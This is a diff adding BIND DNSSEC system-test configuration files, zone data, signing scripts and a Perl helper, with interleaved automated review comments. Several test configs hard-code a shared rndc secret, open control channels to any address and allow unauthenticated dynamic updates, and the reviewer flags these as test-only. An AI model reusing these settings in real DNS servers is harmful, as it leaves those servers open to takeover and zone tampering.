diff --git a/bin/tests/system/dnssec/ns4/managed-keys.bind.in b/bin/tests/system/dnssec/ns4/managed-keys.bind.in
new file mode 100644
index 0000000..570669d
--- /dev/null
+++ b/bin/tests/system/dnssec/ns4/managed-keys.bind.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 0 ; 0 seconds
+@ IN SOA . . (
+ 2 ; serial
+ 0 ; refresh (0 seconds)
+ 0 ; retry (0 seconds)
+ 0 ; expire (0 seconds)
+ 0 ; minimum (0 seconds)
+ )
+ KEYDATA 20221028094934 19700101000000 19700101000000 0 0 0 ; placeholder
diff --git a/bin/tests/system/dnssec/ns4/named1.conf.in b/bin/tests/system/dnssec/ns4/named1.conf.in
new file mode 100644
index 0000000..212ef85
--- /dev/null
+++ b/bin/tests/system/dnssec/ns4/named1.conf.in
@@ -0,0 +1,61 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4 dscp 1;
+ notify-source 10.53.0.4 dscp 2;
+ transfer-source 10.53.0.4 dscp 3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ dnssec-must-be-secure mustbesecure.example yes;
+ minimal-responses no;
+
+ nta-lifetime 12s;
+ nta-recheck 9s;
+
+ validate-except { corp; };
+
+ # Note: We only reference the bind.keys file here to confirm that it
+ # is *not* being used. It contains the real root key, and we're
+ # using a local toy root zone for the tests, so it wouldn't work.
+ # But since dnssec-validation is set to "yes" not "auto", that
+ # won't matter.
+ bindkeys-file "../../../../../bind.keys";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "corp" {
+ type static-stub;
+ server-addresses { 10.53.0.2; };
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/dnssec/ns4/named2.conf.in b/bin/tests/system/dnssec/ns4/named2.conf.in
new file mode 100644
index 0000000..3369b6b
--- /dev/null
+++ b/bin/tests/system/dnssec/ns4/named2.conf.in
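Review bot: The `controls` block opens the rndc channel with `allow { any; }` and authenticates it with a fixed HMAC secret (`1234abcd8765`) committed in the file, and nothing in the hunk marks this as a test-only fixture. The same `key rndc_key` / `controls` pair is repeated in ns4/named2.conf.in through named5.conf.in, ns5/named1.conf.in, ns5/named2.conf.in, ns8/named.conf.in and ns9/named.conf.in. I would add a comment above the key, e.g. `// Test fixture only: fixed, publicly known rndc key; never copy into a real configuration.`, so the block is not reused as a template. If the harness always connects from the 10.53.0.x addresses (not visible here), narrowing `allow { any; }` to that range would cost nothing.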
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4 dscp 4;
+ notify-source 10.53.0.4 dscp 5;
+ transfer-source 10.53.0.4 dscp 6;
+ dscp 16;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation auto;
+ bindkeys-file "managed.conf";
+ minimal-responses no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/dnssec/ns4/named3.conf.in b/bin/tests/system/dnssec/ns4/named3.conf.in
new file mode 100644
index 0000000..d6eaa01
--- /dev/null
+++ b/bin/tests/system/dnssec/ns4/named3.conf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation auto;
+ bindkeys-file "managed.conf";
+ dnssec-accept-expired yes;
+ minimal-responses no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/dnssec/ns4/named4.conf.in b/bin/tests/system/dnssec/ns4/named4.conf.in
new file mode 100644
index 0000000..db42f23
--- /dev/null
+++ b/bin/tests/system/dnssec/ns4/named4.conf.in
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+key auth {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+include "trusted.conf";
+
+view rec {
+ match-recursive-only yes;
+ recursion yes;
+ dnssec-validation yes;
+ dnssec-accept-expired yes;
+ minimal-responses no;
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone secure.example {
+ type static-stub;
+ server-addresses { 10.53.0.4; };
+ };
+
+ zone insecure.secure.example {
+ type static-stub;
+ server-addresses { 10.53.0.4; };
+ };
+};
+
+view auth {
+ recursion no;
+ allow-recursion { none; };
+
+ zone secure.example {
+ type secondary;
+ primaries { 10.53.0.3; };
+ };
+
+ zone insecure.secure.example {
+ type secondary;
+ primaries { 10.53.0.2; };
+ };
+};
diff --git a/bin/tests/system/dnssec/ns4/named5.conf.in b/bin/tests/system/dnssec/ns4/named5.conf.in
new file mode 100644
index 0000000..2be2f02
--- /dev/null
+++ b/bin/tests/system/dnssec/ns4/named5.conf.in
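Review bot: `key auth` carries the same secret as `rndc_key` and is not referenced by either view or by any ACL in this file, so its purpose cannot be read from the configuration; ns4/named5.conf.in declares the same unused key. If the test scripts rely on it (presumably for TSIG-signed queries, which is not visible here), a comment next to it such as `// TSIG key used by the test scripts; not an rndc key` would record that. Giving it a secret different from `rndc_key` would also keep the control-channel key from doubling as a query-signing key; if nothing uses it, it can be dropped.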
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ bindkeys-file "managed.conf";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+key auth {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/dnssec/ns5/named1.conf.in b/bin/tests/system/dnssec/ns5/named1.conf.in
new file mode 100644
index 0000000..deec9c2
--- /dev/null
+++ b/bin/tests/system/dnssec/ns5/named1.conf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/dnssec/ns5/named2.conf.in b/bin/tests/system/dnssec/ns5/named2.conf.in
new file mode 100644
index 0000000..f334e16
--- /dev/null
+++ b/bin/tests/system/dnssec/ns5/named2.conf.in
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; 127.0.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+};
+
+view root {
+ match-destinations { 127.0.0.1; };
+
+ zone "." {
+ type primary;
+ file "root.db.signed";
+ };
+};
+
+view other {
+include "revoked.conf";
+
+ zone "." {
+ type static-stub;
+ server-addresses { 127.0.0.1; };
+ };
+};
diff --git a/bin/tests/system/dnssec/ns5/sign.sh b/bin/tests/system/dnssec/ns5/sign.sh
new file mode 100644
index 0000000..6a6df03
--- /dev/null
+++ b/bin/tests/system/dnssec/ns5/sign.sh
@@ -0,0 +1,39 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+echo_i "ns5/sign.sh"
+
+zone=.
+infile=../ns1/root.db.in
+zonefile=root.db.signed
+
+keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone")
+
+# copy the KSK out first, then revoke it
+keyfile_to_initial_ds "$keyname" > revoked.conf
+
+"$SETTIME" -R now "${keyname}.key" > /dev/null
+
+# create a current set of keys, and sign the root zone
+"$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" $zone > /dev/null
+"$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK $zone > /dev/null
+"$SIGNER" -S -o "$zone" -f "$zonefile" "$infile" > /dev/null 2>&1
+
+keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone ".")
+
+keyfile_to_static_ds "$keyname" > trusted.conf
diff --git a/bin/tests/system/dnssec/ns6/named.args b/bin/tests/system/dnssec/ns6/named.args
new file mode 100644
index 0000000..65b7dbc
--- /dev/null
+++ b/bin/tests/system/dnssec/ns6/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 99 -D dnssec-ns6 -X named.lock -g -T maxcachesize=2097152 -T nonearest -T tat=1
diff --git a/bin/tests/system/dnssec/ns6/named.conf.in b/bin/tests/system/dnssec/ns6/named.conf.in
new file mode 100644
index 0000000..4bdc79c
--- /dev/null
+++ b/bin/tests/system/dnssec/ns6/named.conf.in
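Review bot: In ns5/sign.sh the key whose DS is written to trusted.conf is generated by the last `"$KEYGEN"` call, after `"$SIGNER" -S` has already run, so it cannot have signed root.db.signed, and the script does not say whether that mismatch is intended. If it is (presumably this server is meant to hold a trust anchor that does not match the zone), a comment above that line such as `# generate a key that never signs the zone, for use as a non-matching trust anchor` would stop someone from "fixing" the order. Separately, the two `"$KEYGEN"` calls that create the current keys pass `$zone` unquoted while every other use in the script is quoted; `"$zone"` would be consistent.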
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS6
+
+options {
+ query-source address 10.53.0.6;
+ notify-source 10.53.0.6;
+ transfer-source 10.53.0.6;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ disable-algorithms . { @ALTERNATIVE_ALGORITHM@; };
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "optout-tld" {
+ type primary;
+ file "optout-tld.db.signed";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/dnssec/ns6/optout-tld.db.in b/bin/tests/system/dnssec/ns6/optout-tld.db.in
new file mode 100644
index 0000000..b2aa393
--- /dev/null
+++ b/bin/tests/system/dnssec/ns6/optout-tld.db.in
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 60
+optout-tld. 60 IN SOA example. . 0 0 0 0 0
+optout-tld. 60 IN NS ns6.optout-tld.
+ns6.optout-tld. 60 IN A 10.53.0.6
+a 60 PTR example.
+b 60 PTR example.
+a.b.c.d 60 NS example.
+e 60 PTR example.
+f 60 PTR example.
+g 60 PTR example.
+h 60 PTR example.
diff --git a/bin/tests/system/dnssec/ns6/sign.sh b/bin/tests/system/dnssec/ns6/sign.sh
new file mode 100644
index 0000000..abfb112
--- /dev/null
+++ b/bin/tests/system/dnssec/ns6/sign.sh
@@ -0,0 +1,29 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+echo_i "ns6/sign.sh"
+
+zone=optout-tld
+infile=optout-tld.db.in
+zonefile=optout-tld.db
+
+keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+
+cat "$infile" "$keyname.key" > "$zonefile"
+
+"$SIGNER" -P -3 - -A -o "$zone" "$zonefile" > /dev/null 2>&1
diff --git a/bin/tests/system/dnssec/ns7/named.conf.in b/bin/tests/system/dnssec/ns7/named.conf.in
new file mode 100644
index 0000000..55cbec9
--- /dev/null
+++ b/bin/tests/system/dnssec/ns7/named.conf.in
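Review bot: The `"$SIGNER"` call ends in `> /dev/null 2>&1`, so when signing fails the script stops under `-e` without printing any diagnostic. ns5/sign.sh and ns7/sign.sh use the same redirect, whereas the ns3/sign.sh calls earlier in this diff discard only stdout. Sending the output to a file instead, e.g. `"$SIGNER" -P -3 - -A -o "$zone" "$zonefile" > signer.out 2>&1`, keeps the run quiet but leaves the error available for inspection; the file name is only a suggestion and would need to be added to the test's cleanup.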
@@ -0,0 +1,76 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+options {
+ query-source address 10.53.0.7;
+ notify-source 10.53.0.7;
+ transfer-source 10.53.0.7;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+ minimal-responses yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "nsec3.example" {
+ type secondary;
+ primaries { 10.53.0.3; };
+ file "nsec3.example.bk";
+};
+
+zone "optout.example" {
+ type secondary;
+ primaries { 10.53.0.3; };
+ file "optout.example.bk";
+};
+
+zone "nsec3-unknown.example" {
+ type secondary;
+ primaries { 10.53.0.3; };
+ file "nsec3-unknown.example.bk";
+};
+
+zone "optout-unknown.example" {
+ type secondary;
+ primaries { 10.53.0.3; };
+ file "optout-unknown.example.bk";
+};
+
+zone "multiple.example" {
+ type secondary;
+ primaries { 10.53.0.3; };
+ file "multiple.example.bk";
+};
+
+zone "nosoa.secure.example" {
+ type primary;
+ file "nosoa.secure.example.db";
+};
+
+zone "split-rrsig" {
+ type primary;
+ file "split-rrsig.db.signed";
+ allow-update { any; };
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/dnssec/ns7/named.nosoa b/bin/tests/system/dnssec/ns7/named.nosoa
new file mode 100644
index 0000000..caefbbb
--- /dev/null
+++ b/bin/tests/system/dnssec/ns7/named.nosoa
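Review bot: The `split-rrsig` zone is configured with `allow-update { any; };`, which accepts unsigned dynamic updates from any client that can reach 10.53.0.7, and the hunk gives no reason for it. If the test needs unauthenticated updates, say so next to the statement, e.g. `// test-only: the test sends unsigned dynamic updates to this zone`; otherwise restrict it to a TSIG key. The header comment also reads `// NS3` although the file is ns7/named.conf.in and every address in it is 10.53.0.7; it should be `// NS7`.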
@@ -0,0 +1,12 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+Add -T nosoa.
diff --git a/bin/tests/system/dnssec/ns7/nosoa.secure.example.db b/bin/tests/system/dnssec/ns7/nosoa.secure.example.db
new file mode 100644
index 0000000..d3c9878
--- /dev/null
+++ b/bin/tests/system/dnssec/ns7/nosoa.secure.example.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2010062400 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+@ IN NS ns
+ns IN A 10.53.0.7
+a IN A 1.2.3.4
diff --git a/bin/tests/system/dnssec/ns7/sign.sh b/bin/tests/system/dnssec/ns7/sign.sh
new file mode 100644
index 0000000..55c1988
--- /dev/null
+++ b/bin/tests/system/dnssec/ns7/sign.sh
@@ -0,0 +1,44 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+echo_i "ns7/sign.sh"
+
+zone=split-rrsig
+infile=split-rrsig.db.in
+zonefile=split-rrsig.db
+
+k1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+k2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+
+cat "$infile" "$k1.key" "$k2.key" > "$zonefile"
+
+# The awk script below achieves two goals:
+#
+# - it puts one of the two RRSIG(SOA) records at the end of the zone file, so
+# that these two records (forming a single RRset) are not placed immediately
+# next to each other; the test then checks if RRSIG RRsets split this way are
+# correctly added to resigning heaps,
+#
+# - it places a copy of one of the RRSIG(SOA) records somewhere else than at the
+# zone apex; the test then checks whether such signatures are automatically
+# removed from the zone after it is loaded.
+"$SIGNER" -P -3 - -A -o "$zone" -O full -f "$zonefile.unsplit" -e now-3600 -s now-7200 "$zonefile" > /dev/null 2>&1
+awk 'BEGIN { r = ""; }
+ $4 == "RRSIG" && $5 == "SOA" && r == "" { r = $0; next; }
+ { print }
+ END { print r; print "not-at-zone-apex." r; }' "$zonefile.unsplit" > "$zonefile.signed"
diff --git a/bin/tests/system/dnssec/ns7/split-rrsig.db.in b/bin/tests/system/dnssec/ns7/split-rrsig.db.in
new file mode 100644
index 0000000..48c2f87
--- /dev/null
+++ b/bin/tests/system/dnssec/ns7/split-rrsig.db.in
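Review bot: The awk `END` block prints `r` unconditionally, so if no line of the signer output matches `$4 == "RRSIG" && $5 == "SOA"` the script appends an empty line and a bare `not-at-zone-apex.` to split-rrsig.db.signed and still exits 0. Failing in that case would surface a change in the signer's output format at setup time instead of as an unrelated test failure later: `END { if (r == "") exit 1; print r; print "not-at-zone-apex." r; }`.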
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+split-rrsig. 3660 IN SOA . . (
+ 1 ; serial
+ 3600 ; refresh (1 hour)
+ 3600 ; retry (1 hour)
+ 3600 ; expire (1 hour)
+ 3600 ; minimum (1 hour)
+ )
+ 3660 NS ns.example.
+a.split-rrsig. 3660 IN A 192.0.2.2
+b.split-rrsig. 3660 IN A 192.0.2.2
diff --git a/bin/tests/system/dnssec/ns8/named.conf.in b/bin/tests/system/dnssec/ns8/named.conf.in
new file mode 100644
index 0000000..ef3c913
--- /dev/null
+++ b/bin/tests/system/dnssec/ns8/named.conf.in
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS8
+
+options {
+ query-source address 10.53.0.8;
+ notify-source 10.53.0.8;
+ transfer-source 10.53.0.8;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.8; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ minimal-responses no;
+ disable-algorithms "disabled.managed." { @DISABLED_ALGORITHM@; };
+ disable-algorithms "disabled.trusted." { @DISABLED_ALGORITHM@; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+include "managed.conf";
+include "trusted.conf";
+
diff --git a/bin/tests/system/dnssec/ns9/named.conf.in b/bin/tests/system/dnssec/ns9/named.conf.in
new file mode 100644
index 0000000..d206d56
--- /dev/null
+++ b/bin/tests/system/dnssec/ns9/named.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS9
+
+options {
+ query-source address 10.53.0.9;
+ notify-source 10.53.0.9;
+ transfer-source 10.53.0.9;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.9; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ forward only;
+ forwarders { 10.53.0.4; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/dnssec/ntadiff.pl b/bin/tests/system/dnssec/ntadiff.pl
new file mode 100755
index 0000000..ca80eac
--- /dev/null
+++ b/bin/tests/system/dnssec/ntadiff.pl
@@ -0,0 +1,24 @@
+#!/usr/bin/perl -w
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+use strict;
+use Time::Piece;
+use Time::Seconds;
+
+exit 1 if (scalar(@ARGV) != 2);
+
+my $actual = Time::Piece->strptime($ARGV[0], '%d-%b-%Y %H:%M:%S.000 %z');
+my $expected = Time::Piece->strptime($ARGV[1], '%s') + ONE_WEEK;
+my $diff = abs($actual - $expected);
+
+print($diff . "\n");
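Review bot: ntadiff.pl has no comment saying what its two arguments are, and a wrong argument count ends in a bare `exit 1` with nothing on stderr. I would add a header comment such as `# Usage: ntadiff.pl <actual 'DD-Mon-YYYY HH:MM:SS.000 +ZZZZ'> <start-epoch>; prints |actual - (start + 1 week)| in seconds` and change the guard to `if (scalar(@ARGV) != 2) { print STDERR "usage: $0 <actual> <start-epoch>\n"; exit 1; }`. The format string also hard-codes `.000` as the fractional part, so a timestamp with non-zero milliseconds would presumably fail to parse; a comment should say whether that is intended.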
diff --git a/bin/tests/system/dnssec/prereq.sh b/bin/tests/system/dnssec/prereq.sh
new file mode 100644
index 0000000..90f5a55
--- /dev/null
+++ b/bin/tests/system/dnssec/prereq.sh
@@ -0,0 +1,45 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
